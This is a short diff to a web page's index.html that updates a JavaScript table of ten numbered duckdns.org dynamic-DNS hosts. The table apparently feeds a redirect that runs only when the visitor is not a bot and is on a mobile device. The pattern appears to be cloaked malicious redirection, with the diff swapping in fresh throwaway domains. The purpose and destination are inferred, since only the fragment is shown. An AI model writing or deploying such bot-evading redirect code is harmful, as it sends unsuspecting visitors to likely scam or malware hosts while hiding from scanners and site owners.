--- a/index.html
+++ b/index.html
@@ -270,16 +270,16 @@
 
 
             var links = {
-                "AR01": "https://1323421341.duckdns.org",
-                "AR02": "https://1323421342.duckdns.org",
-                "AR03": "https://1323421343.duckdns.org",
-                "AR04": "https://1323421344.duckdns.org",
-                "AR05": "https://1323421345.duckdns.org",
-                "AR06": "https://1323421346.duckdns.org",
-                "AR07": "https://1323421347.duckdns.org",
-                "AR08": "https://1323421348.duckdns.org",
-                "AR09": "https://1323421349.duckdns.org",
-                "AR10": "https://13234213410.duckdns.org",
+                "AR01": "9323421341.duckdns.org",
+                "AR02": "9323421342.duckdns.org",
+                "AR03": "9323421343.duckdns.org",
+                "AR04": "9323421344.duckdns.org",
+                "AR05": "9323421345.duckdns.org",
+                "AR06": "9323421346.duckdns.org",
+                "AR07": "9323421347.duckdns.org",
+                "AR08": "9323421348.duckdns.org",
+                "AR09": "9323421349.duckdns.org",
+                "AR10": "93234213410.duckdns.org",
 
             };
             if (!is_bot && is_MIbile) {
